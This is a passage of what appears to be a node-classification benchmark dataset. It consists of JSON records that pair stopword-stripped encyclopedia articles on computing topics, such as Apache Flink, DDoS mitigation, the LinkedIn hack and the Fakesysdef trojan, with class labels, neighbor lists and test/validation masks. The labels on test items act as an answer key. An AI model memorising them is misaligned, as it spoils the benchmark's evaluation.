thread could de-allocated servers could go receive mode awaiting requests contrast microkernel systems based model asynchronous communications opposed synchronous procedure calls canonical microkernel system mach modeled messages i/o several important side-effects primary among normal task schedulers unix-like systems normally block client waiting i/o request way actions pausing restarting applications waiting messages already built underlying system downside approach scheduler fairly heavyweight calling serious performance bottleneck led extensive development efforts improve performance v-system model message passing overhead reduced process scheduler consulted question next run – server called downside v approach requires work server side response may take time process one major addition ipc system vanguard opposed v concept message chains allowing single message sent several interacting servers single round-trip theory chaining could improve performance common multi-step operations consider case client application wishes read file normally would require one message kernel find file server three additional messages file server one resolve file name object id another open id finally another read file using vanguard chaining single message could constructed client contained requests message would sent kernel passed file server would handle three requests finally returning data much performance problem normally associated microkernel systems due context switches messages passed back forth applications example running v system would total eight context switches two request client switched kernel vanguard using chain would reduce three switches one client kernel another kernel file server finally server back client cases overhead context switch greater time takes actually run request vanguard chaining mechanism could result real-world performance improvements v also introduced simple distributed name service name service stored well known character names representing various objects distributed v system instance 2nd floor laser printer applications could ask name server objects name would handed back identifier would allow interact object name service separate server managed code kernel contrast full-blown name server spring operating system knew objects inside system also used servers system translate private names – file names ip addresses instance v-system objects servers referred via ad hoc private key sort say 32-bit integer clients would pass keys servers order maintain conversation specific task instance application might ask kernel file system handed 32-bit key representing program id use key send message file system asking open file addresses would result 64-bit key handed back keys example proprietary servers common key format used across system sort name resolving common v authors decided make keys first-class citizens vanguard instead using whatever object id servers happened use vanguard servers expected understand return globally unique 128-bit key first 64-bits containing server identifier second identifying object server server id maintained kernel allowing hand message network server referenced remote machine client invisible clear id handed randomly avoid guessing ill-intentioned software",
    "neighbors": [
      9441,
      2761,
      7561,
      9931,
      11180,
      7983,
      5363,
      7187,
      8700,
      11123,
      5976,
      5049,
      6300,
      10813
    ],
    "mask": "Test"
  },
  {
    "node_id": 9177,
    "label": 1,
    "text": "Comparison_of_database_tools:comparison database tools following tables compare general technical information number available please see individual product articles information article neither all-inclusive necessarily date systems listed light purple background longer active development legend legend legend",
    "neighbors": [
      4614,
      4106,
      1037,
      2063,
      10258,
      3096,
      1562,
      8742,
      1579,
      5677,
      10286,
      3636,
      72,
      5198,
      5727,
      1632,
      11362,
      1636,
      10340,
      8295,
      8808,
      1135,
      2681,
      5242,
      10873,
      6780,
      2688,
      11392,
      1668,
      9867,
      6797,
      9360,
      5779,
      10899,
      10389,
      4255,
      8871,
      9389,
      10413,
      5808,
      10418,
      3254,
      3768,
      11457,
      6850,
      5827,
      9942,
      10459,
      2780,
      10470,
      10471,
      237,
      6383,
      8434,
      7412,
      2810,
      9467,
      9471,
      9481,
      10505,
      10518,
      11030,
      4376,
      7968,
      290,
      1314,
      7461,
      6451,
      823,
      4919,
      9527,
      4416,
      2369,
      5441,
      8518,
      5960,
      5964,
      853,
      2901,
      8539,
      860,
      7523,
      1383,
      8554,
      2413,
      7022,
      3951,
      9079,
      888,
      10108,
      6015,
      8582,
      9112,
      5546,
      10157,
      5550,
      8627,
      3004,
      9661,
      10173,
      9663,
      8644,
      5583,
      4561,
      3541,
      987,
      479,
      9183,
      8683,
      10737,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 9178,
    "label": 9,
    "text": "Pack200:pack200 pack200 specified jsr 200 deprecated jep 336 compacting archive format developed sun capable reducing jar file sizes factor 7 9 pack200 optimized compressing jar archive files specifically java bytecode portion jar files applications technology included faster java application deployment java web start pack200 usually gzip compression applied http compression content specified content-encoding type pack200-gzip stored file extension .pack.gz used pack200 may also referred pack200 compression tools pack200 unpack200 provided sun java development kit since java 5 well pack200 compressed files",
    "neighbors": [
      4960,
      9665,
      8108,
      910,
      4561
    ],
    "mask": "None"
  },
  {
    "node_id": 9179,
    "label": 3,
    "text": "Apache_Flink:apache flink apache flink open-source stream-processing framework developed apache software foundation core apache flink distributed streaming data-flow engine written java scala flink executes arbitrary dataflow programs data-parallel pipelined manner flink pipelined runtime system enables execution bulk/batch stream processing programs furthermore flink runtime supports execution iterative algorithms natively flink provides high-throughput low-latency streaming engine well support event-time processing state management flink applications fault-tolerant event machine failure support exactly-once semantics programs written java scala python sql automatically compiled optimized dataflow programs executed cluster cloud environment flink provide data-storage system provides data-source sink connectors systems amazon kinesis apache kafka alluxio hdfs apache cassandra elasticsearch apache flink developed apache license 2.0 apache flink community within apache software foundation project driven 25 committers 340 contributors data artisans company founded original creators apache flink 12 apache flink committers currently employed data artisans apache flink dataflow programming model provides event-at-a-time processing finite infinite datasets basic level flink programs consist streams transformations “ conceptually stream potentially never-ending flow data records transformation operation takes one streams input produces one output streams result. ” apache flink includes two core apis datastream api bounded unbounded streams data dataset api bounded data sets flink also offers table api sql-like expression language relational stream batch processing easily embedded flink datastream dataset apis highest-level language supported flink sql semantically similar table api represents programs sql query expressions upon execution flink programs mapped streaming dataflows every flink dataflow starts one sources data input e.g. message queue file system ends one sinks data output e.g. message queue file system database arbitrary number transformations performed stream streams arranged directed acyclic dataflow graph allowing application branch merge dataflows flink offers ready-built source sink connectors alluxio apache kafka amazon kinesis hdfs apache cassandra flink programs run distributed system within cluster deployed standalone mode well yarn mesos docker-based setups along resource management frameworks apache flink includes lightweight fault tolerance mechanism based distributed checkpoints checkpoint automatic asynchronous snapshot state application position source stream case failure flink program checkpointing enabled upon recovery resume processing last completed checkpoint ensuring flink maintains exactly-once state semantics within application checkpointing mechanism exposes hooks application code include external systems checkpointing mechanism well like opening committing transactions database system flink also includes mechanism called savepoints manually-triggered checkpoints user generate savepoint stop running flink program resume program application state position stream savepoints enable updates flink program flink cluster without losing application state flink 1.2 savepoints also allow restart application different parallelism—allowing users adapt changing workloads flink datastream api enables transformations e.g filters aggregations window functions bounded unbounded streams data datastream api includes 20 different types transformations available java scala simple example stateful stream processing program application emits word count continuous input stream groups data 5-second windows import org.apache.flink.streaming.api.scala._ import org.apache.flink.streaming.api.windowing.time.time case class wordcount word string count int object windowwordcount apache beam “ provides advanced unified programming model allowing developer implement batch streaming data processing jobs run execution engine. ” apache flink-on-beam runner feature-rich according capability matrix maintained beam community data artisans conjunction apache flink community worked closely beam community develop flink runner flink dataset api enables transformations e.g. filters mapping joining grouping bounded datasets dataset api includes 20 different types transformations api available java scala experimental python api flink dataset api conceptually similar datastream api flink table api sql-like expression language relational stream batch processing embedded flink java scala dataset datastream apis table api sql interface operate relational table abstraction tables created external data sources existing datastreams datasets table api supports relational operators selection aggregation joins tables tables also queried regular sql table api sql offer equivalent functionality mixed program table converted back dataset datastream logical plan defined relational operators sql queries optimized using apache calcite transformed dataset datastream program flink forward annual conference apache flink first edition flink forward took place 2015 berlin two-day conference 250 attendees 16 countries sessions organized two tracks 30 technical presentations flink developers one additional track hands-on flink training 2016 350 participants joined conference 40 speakers presented technical talks 3 parallel tracks third day attendees invited participate hands-on training sessions 2017 event expands san francisco well conference day dedicated technical talks flink used enterprise flink system internals ecosystem integrations flink future platform features keynotes talks flink users industry academia hands-on training sessions apache flink speakers following organizations presented flink forward conferences alibaba amadeus bouygues telecom capital one cloudera data artisans emc ericsson hortonworks huawei ibm google mapr mongodb netflix new relic otto group red hat researchgate uber zalando 2010 research project stratosphere information management cloud funded german research foundation dfg started collaboration technical university berlin humboldt-universität zu berlin hasso-plattner-institut potsdam flink started fork stratosphere distributed execution engine became apache incubator project march 2014 december 2014 flink accepted apache top-level project release dates apache incubator release dates pre-apache stratosphere release dates",
    "neighbors": [
      9344,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      1913,
      2842,
      6555,
      8217,
      8860,
      11161,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      7159,
      4919,
      5047,
      4538,
      1851,
      6074,
      6458,
      7485,
      7742,
      9789,
      4417,
      6338,
      4419,
      7233,
      10303,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      8523,
      4944,
      7248,
      1363,
      5332,
      8408,
      7261,
      990,
      8799,
      10719,
      865,
      6113,
      11235,
      8294,
      11111,
      8425,
      8554,
      747,
      5612,
      8810,
      9455,
      2163,
      5238,
      6774,
      3705,
      1018,
      3323,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 9180,
    "label": 6,
    "text": "Logic_File_System:logic file system logic file system research file system replaces pathnames expressions propositional logic allows file metadata queried superset boolean syntax commonly used modern search engines actual name logic information systems file system abbreviated lisfs avoid confusion log-structured file system lfs implementation logic file system available lisfs website intended used unix-like operating systems bit difficult install needs several non-standard ocaml modules",
    "neighbors": [
      1825,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9181,
    "label": 4,
    "text": "DDoS_mitigation:ddos mitigation ddos mitigation set techniques tools resisting mitigating impact distributed denial-of-service ddos attacks networks attached internet protecting target relay networks ddos attacks constant threat businesses organizations threatening service performance shut website entirely even short time first things ddos mitigation identify normal conditions network traffic defining “ traffic patterns ” necessary threat detection alerting ddos mitigation also requires identifying incoming traffic separate human traffic human-like bots hijacked web browsers process done comparing signatures examining different attributes traffic including ip addresses cookie variations http headers javascript footprints detection made next process filtering filtering done anti-ddos technology like connection tracking ip reputation lists deep packet inspection blacklisting/whitelisting rate limiting one technique pass network traffic addressed potential target network high-capacity networks traffic scrubbing filters manual ddos mitigation longer recommended due ddos attackers able circumvent ddos mitigation software activated manually ways prevent ddos attacks implemented on-premise or/and via cloud-based solution providers on-premise mitigation technology commonly hardware device placed front ” network disadvantage filtering capacity limited capacity filtering device middle option hybrid solution combining on-premise filtering cloud-base filtering best practices ddos mitigation include anti-ddos technology anti-ddos emergency response services ddos mitigation also available cloud-based providers ddos attacks executed websites networks selected victims number vendors offering ddos resistant hosting services mostly based techniques similar content delivery networks distribution avoids single point congestion prevents ddos attack concentrating single target one technique ddos attacks use misconfigured third-party networks allow amplification spoofed udp packets proper configuration network equipment enabling ingress filtering egress filtering documented bcp 38 rfc 6959 prevents amplification spoofing thus reducing number relay networks available attackers",
    "neighbors": [
      10368,
      5636,
      3462,
      11413,
      7965,
      5407,
      5295,
      10417,
      4414,
      1088,
      2240,
      6080,
      6347,
      3807,
      4194,
      3941,
      2409,
      8176,
      8956,
      7037
    ],
    "mask": "None"
  },
  {
    "node_id": 9182,
    "label": 3,
    "text": "Apple_A9X:apple a9x apple a9x 64-bit arm-based system chip soc designed apple inc first appeared ipad pro announced september 9 2015 released november 11 2015 a9x m9 motion coprocessor embedded new innovation seen previous chip generations variant a9 apple claims 1.8 times cpu performance 2 times gpu performance predecessor a8x a9x features apple-designed 64-bit armv8-a dual-core cpu called twister offers double memory bandwidth double storage performance apple a8x unlike a9 a9x contain l3 cache due significant dram bandwidth a9x paired 4 gb lpddr4 memory 12.9 ipad pro 2 gb lpddr4 memory 9.7 ipad pro total bandwidth 51.2 gb/s high bandwidth necessary feed soc 12-core powervr 7 series gpu ram included a9x package unlike sibling a9 a9x uses nand interface a9 uses apple-designed nvme-based controller communicates pcie connection ipad pro nand design akin pc-class ssd embedded flash memory common mobile devices gives ipad pro significant storage performance advantage competitors often use msata emmc connect storage systems",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      2673,
      6258,
      10357,
      6264,
      10361,
      4220,
      7292,
      2686,
      638,
      6783,
      7806,
      10365,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      1177,
      666,
      4251,
      3228,
      5786,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      171,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      9430,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      7991,
      11066,
      2363,
      6971,
      2365,
      2366,
      9022,
      11257,
      1346,
      8003,
      10562,
      6981,
      838,
      7496,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      9063,
      10602,
      3948,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      398,
      1428,
      3483,
      4508,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      7133,
      4068,
      5093,
      487,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 9183,
    "label": 1,
    "text": "Database_publishing:database publishing database publishing area automated media production specialized techniques used generate paginated documents source data residing traditional databases common examples mail order catalogues direct marketing report generation price lists telephone directories database content form text pictures also contain metadata related formatting special rules may apply document generation process database publishing incorporated larger workflows component documents created approved revised released basic idea using database contents like article price information fill pre-formatted template documents templates typically created normal desktop layout application certain boxes text designated placeholders placeholders targeted new content flows database allows quick generation final output case changes database quickly perform updates limited manual intervention another model database publishing found many web-to-print sites users browse templates online catalog business cards brochures personalize selected template filling form view rendered result case initial source data user input captured database user revisits site later resume editing left form pre-filled database-stored variables user entered main layout applications workflow datalogics pager adobe framemaker indesign quarkxpress xyvision arbortext advanced print publisher formerly 3b2 generally layout applications corresponding server version receives commands via web interfaces rather desktop interaction quarkxpress server adobe indesign server take full advantage design features available respective desktop versions applications make broad spectrum features available extension integration vertical products developed either internally form scripting e.g javascript applescript indesign externally api corresponding developer kits variants database publishing rendering content direct pdf output approach prevents manual intervention final output since pdf comfortably editable may perceived limitation situations like report generation manual editability needed desired",
    "neighbors": [
      2688,
      3462,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      9683,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 9184,
    "label": 4,
    "text": "Business_continuity_planning:business continuity planning business continuity planning business continuity resiliency planning process creating systems prevention recovery deal potential threats company addition prevention goal enable ongoing operations execution disaster recovery organization resistance failure ability ... withstand changes environment still function often called resilience capability enables organizations either endure environmental changes without permanently adapt organization forced adapt new way working better suits new environmental conditions event could negatively impact operations included plan supply chain interruption loss damage critical infrastructure major machinery computing /network resource bcp subset risk management us government entities refer process continuity operations planning coop business continuity plan outlines range disaster scenarios steps business take particular scenario return regular trade bcp written ahead time also include precautions put place usually created input key staff well stakeholders bcp set contingencies minimize potential harm businesses adverse scenarios 2005 analysis disruptions adversely affect operations corporations investments resilience give competitive advantage entities prepared various contingencies extended then-common business continuity planning practices business organizations council competitiveness embraced resilience goal adapting change apparently slower evolutionary manner sometimes many years decades described resilient term strategic resilience used go beyond resisting one-time crisis rather continuously anticipating adjusting case change becomes desperately obvious approach sometimes summarized preparedness protection response recovery business continuity intended outcome proper execution business continuity planning disaster recovery payoff cost-effective buying spare machines servers performing backups bringing off-site assigning responsibility performing drills educating employees vigilant major cost planning preparation audit compliance management documents automation tools available reduce time cost associated manually producing information several business continuity standards published various standards bodies assist checklisting ongoing tasks planners must information analysis phase consists quantifying loss ratios must also include dollars defend lawsuit estimated dollar spent loss prevention prevent seven dollars disaster-related economic loss business impact analysis bia differentiates critical urgent non-critical non-urgent organization functions/activities function may considered critical dictated law function two values assigned maximum time constraints long enterprise key products services unavailable undeliverable stakeholders perceive unacceptable consequences named according iso 22301 terms maximum acceptable outage maximum tolerable period disruption mean thing defined using exactly words defining recovery requirements potential threat may require unique recovery steps common threats include areas cascade responders stumble supplies may become depleted 2002-2003 sars outbreak organizations compartmentalized rotated teams match incubation period disease also banned in-person contact business non-business hours increased resiliency threat impact scenarios identified documented reflect widest possible damage share seven tiers disaster recovery released 1992 updated 2012 ibm eight tier model two main requirements impact analysis stage phase overlaps disaster recovery planning solution phase determines british standards institution bsi released series standards itil defined terms within uk bs 25999-2:2007 bs 25999-1:2006 used business continuity management across organizations industries sectors documents give practical plan deal eventualities—from extreme weather conditions terrorism system failure staff sickness 2004 following crises preceding years uk government passed civil contingencies act 2004 businesses must continuity planning measures survive continue thrive whilst working towards keeping incident minimal possible act separated two parts united kingdom australia incorporated resilience continuity planning united kingdom resilience implemented locally local resilience forum new zealand canterbury university resilient organisations programme developed assessment tool benchmarking resilience organisations covers 11 categories 5 7 questions resilience ratio summarizes evaluation implementation phase involves policy changes material acquisitions staffing testing 2008 book exercising excellence published british standards institution identified three types exercises employed testing business continuity plans start stop times pre-agreed actual duration might unknown events allowed run course biannual annual maintenance cycle maintenance bcp manual broken three periodic activities issues found testing phase often must reintroduced analysis phase bcp manual must evolve organization maintain information know specialized technical resources must maintained checks include software work process changes must documented validated including verification documented work process recovery tasks supporting disaster recovery infrastructure allow staff recover within predetermined recovery time objective",
    "neighbors": [
      6019,
      903,
      7979,
      3757,
      5327,
      6514,
      11157,
      7898,
      7739,
      4956,
      5373,
      383
    ],
    "mask": "Test"
  },
  {
    "node_id": 9185,
    "label": 9,
    "text": "XTalk:xtalk xtalk loosely defined family scripting languages mother xtalk languages hypertalk language used apple hypercard environment languages characterized simple english-like syntaxes using real-life metaphors top smalltalk-style image message sending apparatus pascal-style block boundaries less rigid structure xtalk languages share common set basic data structures commands well general object model thus allow relative portability among programming languages bear surface similarities hypertalk inspired however object models differ substantially porting code another xtalk requires complete rewrite xtalk languages share following basic constructs xtalk smalltalk-like messaging send message write command function call like pascal message parameters require declarations resolved runtime correct handler handler looks like behaves pretty much like pascal equivalent except parameter list variadic fewer parameters passed handler declares first line remaining variables filled empty strings passed quietly ignored instead declaring parameters list handler name also accessed using functions also gives access ignored parameters xtalk scripts often attached objects hypertalk supertalk mediatalk livecode though always e.g compileit sensetalk script contain handler particular message uses message passed owning object script handle scripts also manually pass message parent using command xtalks support following basic commands main assignment statement xtalks also support prefixing/suffixing values also support 'get value command equivalent put statement container named 'it like pascal handler passes data back message sender also valid command handlers return value stored built-in variable change property object range text text contents given value used modify instance variables objects well apply text styles text fields object specified global property host application assumed xtalks support conditional statements following form line break following statement token omitted single command may follow statement may omitted allows writing entire if-then-else statement single line chaining conditionals if-then-else-if-then-else chains also entire block may omitted token may wrapped onto next line loop statements quite free-form many dialects add additional loop syntax things like looping chunks xtalks support usual mathematic expressions apart usual operators also support integer division exponent remainder integer division codice_1 equality unequality codice_2 codice_3 number comparison/string sort order substring matching point coordinates lie inside rectangle coordinates boolean negation logical booleans logical booleans string concatenation string concatenation space type detection determine file/object existence variables xtalks need declared rather transparently created value first put variable name used nothing yet put treated unquoted string literal evaluates name thus mimicking behavior line-by-line interpreter variables xtalks variants conceptually strings interpreted internally data type current operation performed however may following types string integer number point rect date logical aka boolean equal string representations case rects points comma-separated lists numbers h v resp left top right bottom logicals true false perfectly valid perform string operations numbers immediately mathematical operations global variables need declared using special keyword often xtalks word used instead import current handler scope xtalks support chunk expressions mid-level operations extract modify substring ranges variable expressions value container usually form supported chunk types usually char acter item word line though dialects add support bytes chunk units xtalks support changing delimiter use items default comma using property reset later point though supertalk resets comma end handler hypertalk resets idle time i.e system events also mathematical commands like etc xtalks based hypercard 1.2-level architecture since hypercard 1.2 support multiple windows menus movies web browsers many xtalks implement aspects differently e.g supertalk implements multiple windows replacing 'stack level object hierarchy 'project script container representing file 'window effectively stack used may several one project file whereas hypercard 2.0 livecode kept 'stack level instead provided new different commands allow requesting second stack opened window instead replacing current stack onscreen hypersense kept similar approach renamed 'card 'page popup buttons menus fully native persistent objects project file image scripts supertalk referenced 'item copy menu edit like hypertalk transient objects added global menu bar shared stacks using 'create menu command referenced 'menuitem copy menu edit single-line 'menumessage send picked similarly types styles objects placed card differ greatly xtalks divergence point hypercard 1.2.x buttons fields supercard let background fields content different cards requiring use draw text graphics labels instead hypercard hypercard 2.x compound term 'part subsume buttons fields etc card also supported xtalks although hypercard never provided feature xtalks today implement 'user properties feature first introduced supercard allows adding custom instance variables existing objects host application used like built-in properties hold data type example using user property also codice_4 command remove properties object",
    "neighbors": [
      544,
      8225,
      4486,
      3462,
      4844,
      6958,
      10097,
      8854,
      9209
    ],
    "mask": "Test"
  },
  {
    "node_id": 9186,
    "label": 4,
    "text": "2012_LinkedIn_hack:2012 linkedin hack social networking website linkedin hacked june 5 2012 passwords nearly 6.5 million user accounts stolen russian cybercriminals owners hacked accounts longer able access accounts website repeatedly encouraged users change passwords incident vicente silveira director linkedin confirmed behalf company website hacked official blog also said holders compromised accounts would find passwords longer valid website stolen passwords hashed i.e checksum stored allowing testing whether given password correct one cracked posted russian password forum later day morning june 6 passwords thousands accounts available online plain text graham cluley internet security firm sophos warned leaked passwords could possession criminals 6 june linkedin said official statement would email members security instructions instructions could reset passwords may 2016 linkedin discovered additional 100 million email addresses hashed passwords claimed additional data 2012 breach response linkedin invalidated passwords users changed passwords since 2012 rep. mary bono mack united states congress commented incident many times going happen congress finally wakes takes action latest incident brings sharp focus need pass data protection legislation senator patrick leahy said reports another major data breach give pause american consumers ever share sensitive personal information online transactions networking ... congress make comprehensive data privacy cybercrime legislation top priority marcus carey security researcher rapid7 said hackers penetrated databases linkedin preceding days expressed concerns may access website even attack michael aronowitz vice president saveology said everyday hundreds sites hacked personal information obtained stealing login information one account easily used access accounts hold personal financial information security experts indicated stolen passwords encrypted way fairly easy decrypt one reasons data breach katie szpyrka long time user linkedin illinois united states filed 5 million lawsuit linkedin complaining company keep promises secure connections databases erin ’ harra spokeswoman working linkedin asked lawsuit said lawyers looking take advantage situation propose bills sopa pipa united states congress amended complaint filed nov. 26 2012 behalf szpyrka another premium linkedin user virginia united states named khalilah gilmore–wright class representatives linkedin users affected breach lawsuit sought injunctive equitable relief well restitution damages plaintiffs members class linkedin apologized immediately data breach asked users immediately change passwords federal bureau investigation assisted linkedin corporation investigating theft 8 june 2012 investigation still early stages company said unable determine whether hackers also able steal email addresses associated compromised user accounts well linkedin said users whose passwords compromised would unable access linkedin accounts using old passwords internet security experts said passwords easy unscramble linkedin failure use salt hashing considered insecure practice allows attackers quickly reverse scrambling process using existing standard rainbow tables pre-made lists matching scrambled unscrambled passwords another issue sparked controversy ios app provided linkedin grabs personal names emails notes mobile calendar without user approval security experts working skycure security said application collects user personal data sends linkedin server linkedin claimed permission feature user-granted information sent securely using secure sockets layer ssl protocol company added never stored shared information third party october 5 2016 russian hacker detained czech police prague united states requested interpol warrant united states grand jury indicted nikulin three unnamed co-conspirators charges aggravated identity theft computer intrusion prosecutors alleged nikulin stole linkedin employee username password using gain access corporation network nikulin also accused hacking dropbox formspring allegedly conspiring sell stolen formspring customer data including usernames e-mail addresses passwords nikulin facing czech hearing determine whether extradited united states russian foreign ministry spokesperson maria zakharova indicated russian authorities trying block extradition nikulin currently held santa rita jail nikulin scheduled undergo psychological evaluation determine whether mentally competent",
    "neighbors": [
      1024,
      5636,
      4623,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      1251,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      4956,
      9055,
      3956,
      9082,
      10110,
      3984,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9187,
    "label": 4,
    "text": "Fakesysdef:fakesysdef trojan win32/fakesysdef originally dispersed application called hdd defragmenter hence name fakesysdef fake system defragmenter computer trojan type computer virus targeting microsoft windows operating system first documented late 2010 win32/fakesysdef manifests one array programs purport scan one computer hardware failures related system memory hard drives system functionality whole scan computer show false hardware issues present remedy defrag hard drives fine-tune system performance request user make payment order activate program user download new updates repair hardware issues fictitious scanning program detects one widespread varieties risks prevalent internet today everyday numerous fake antivirus security applications published released unsuspecting end-users via large assortment distribution channels many times software turn clones – developed code base packaged unique title design use skin branding strategy may look legitimate computer users names usually combination technical words hdd disk memory action words scanner defragmenter diagnostics repair fix users may encounter kind threat visit websites attempt convince remove non-existent malware security risks computers installing bogus software trojan also installed malware drive-by downloads downloading installing software users may directed sites way following methods programs intentionally misrepresent security status computer continually presenting fake scan dialog boxes alert messages prompt user buy product programs often icon notification area operating system desktop constantly display pop-up messages alerting user fake security issues virus infections pop-up windows disappear user purchased product non-existent threats supposedly removed compromised computer user decides purchase product presented form within application redirected website requests credit card information win32/fakesysdef installer may arrive computer various file names run installer drops injects dll file sometimes exe file common processes example explorer.exe winlogon.exe wininet.exe instances main executable drops dll exe components case exe set run every windows restart dll injected explorer.exe exe component ensure automatically runs every time windows starts drops copy exe component using random file name appdata folder win32/fakesysdef may make widespread changes system including modifying several internet explorer settings enabling submitting non-encrypted form data changing desktop wallpaper displaying hiding shortcuts hiding desktop start menu links disabling windows task manager disabling checking signatures downloaded programs setting low risk file types additionally win32/fakesysdef variants may terminate running processes installation may block launched application computer restarts installation process may terminate running processes force computer restart restart fakesysdef attempts block every launched program may display fake error messages offering fix problem repeatedly restarts computer user agrees buy fake software overwrites data hard drive/hard drive disk/hdd win32/fakesysdef displays numerous false alerts indicating system errors displaying appearance scanning hard disk defragmenting prompts user fix errors button buy activate fix discovered errors fix errors button selected fakesysdef pretends scan defragment hard disk displays fake error messages tells user needs purchase advanced module fix user chooses browser opens open custom web browser user input card information buy software anti-virus software makers responded threat fakesysdef adding checks products simple removal software enabled sometimes enough reverse damage configuration files fakesysdef known edit",
    "neighbors": [
      3072,
      6786,
      7044,
      10245,
      10756,
      9356,
      6797,
      3473,
      8978,
      4863,
      4883,
      9233,
      278,
      3351,
      10392,
      1690,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      7983,
      1970,
      3643,
      444,
      6588,
      7739,
      8639,
      1088,
      9791,
      3395,
      4165,
      2508,
      7515,
      4344,
      3941,
      107,
      877,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 9188,
    "label": 9,
    "text": "TI_BASIC_(TI_99/4A):ti basic ti 99/4a ti basic ansi-compliant basic programming language interpreter built 1981 texas instruments ti-99/4a home computer predecessor ti-99/4 1979 developed microsoft bob wallace bob greenberg version supporting compiled code used commercial development language ti-990 range minicomputers text full screen graphics logic operations recording tape file system supported ti basic texas instruments also produced ti extended basic cartridge enhanced functionality accessible basic users statements ti basic call close data def dim display end for..to..step gosub goto if..then..else input let next on..gosub on..goto open option base print randomize read rem restore return stop every line ti basic contain one statement possibility put several statements line also necessary peek load calls use assembly language routines became available ti extended basic note poke statement ti basic loading executing machine code requires 32k memory expansion ti editor/assembler cartridge gives access call load 256 bytes ram directly accessible cpu mostly consumed basic interpreter ti basic stored ran programs 16k video ram unlike ti extended basic could take advantage 32k memory expansion unlike microsoft basics used left mid right instr manipulating strings ti basic used ansi-compliant seg pos subprograms called call statement e.g call clear user defined subprograms possible ti extended basic subprograms predefined ti basic written interpreted byte-code language known graphics programming language unique ti-99 line ti extended basic improved execution speed somewhat providing functionality assembly language wallace said put lot extra time trying get ti basic funny little things ... basic could bring line edit line ... suppose wanted line somewhere else ca n't edit line numbers n't work way worked lot get work way",
    "neighbors": [
      2432,
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      6813,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7612,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      2383,
      1879,
      92,
      11229,
      2915,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      7421,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 9189,
    "label": 6,
    "text": "Episode_filesystem:episode filesystem episode posix compliant file system commonly known use dce/dfs file servers designed achieve goals portability scaling make efficient use available system bandwidth used variety methods achieve goals one use metadata logging designed enhance file system performance episode file system basis ibm z/os posix-compatible file system called zfs",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      2168,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
